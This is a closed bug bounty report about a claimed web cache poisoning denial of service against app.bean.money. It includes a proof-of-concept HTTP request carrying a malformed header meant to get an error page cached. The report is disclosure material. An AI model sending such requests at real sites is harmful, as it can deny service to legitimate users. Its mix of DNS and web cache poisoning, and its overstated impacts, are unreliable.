Report #34043

Report Date

August 4, 2024

Status

Closed

Payout

Cache poisoned triggered due to illegal input in header field leads to denial of service in small scope.

‣

Report Info

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close since being out of scope for Beanstalk bug bounty program.
claimed impact by the whitehat is in scope for the bug bounty program
claimed asset by the whitehat is in scope for the bug bounty program
claimed severity is not in scope for the bug bounty program
The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.

Cache poisoned triggered due to illegal input in header field leads to denial of service in small scope.

‣

Report Info

Report ID

#34043

Report type

Websites and Applications

Has PoC?

Yes

Target

https://app.bean.money

Impacts

Redirecting users to malicious websites
Taking down the application/website requiring manual restoration
Persistent content spoofing / text injection issues

Description

Cache poisoning is a type of cyber attack in which attackers insert fake information into a domain name system (DNS) cache or web cache for the purpose of harming users. In DNS cache poisoning or DNS spoofing, an attacker diverts traffic from a legitimate server to a malicious/dangerous server.

Vulnerability Details

These are the points of Cache Poisoning

An attacker sends a simple HTTP request containing a malicious header targeting a victim resource provided by some web server. The request is processed by the intermediate cache, while the malicious header remains unobtrusive.
The cache forwards the request to the origin server as it does not store a fresh copy of the targeted resource. At the origin server, the request processing provokes an error due to the malicious header it contains.
As a consequence, the origin server returns an error page which gets stored by the cache instead of the requested resource.
The attacker knows that the attack was successful when she retrieved an error page in response.
Legitimate users trying to obtain the target resource with subsequent requests......will get the cached error page instead of the original content.

Impact Details

Actually if the scope is large, once the error page is injected, the CDN distributes it to many other edge cache server locations around the world. But here (in this case), the root cause is illegal character which is allowed inputed in header field.

References

Proof of concept

Execute this request (under Host: app.bean.money, add ":1)

GET / HTTP/2
Host: app.bean.money
": 1
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:109.0) Gecko/20100101 Firefox/115.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate, br
Referer: https://app.bean.money/
Dnt: 1
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
Te: trailers

The response should be blank page

Immunefi Response

Immunefi has reviewed this vulnerability report and decided to close since being out of scope for Beanstalk bug bounty program.

claimed impact by the whitehat is in scope for the bug bounty program
claimed asset by the whitehat is in scope for the bug bounty program
claimed severity is not in scope for the bug bounty program

The project will now be automatically subscribed and receive a report of the closed submission and can evaluate if they are interested in re-opening it. However, note that they are not under any obligation to do so.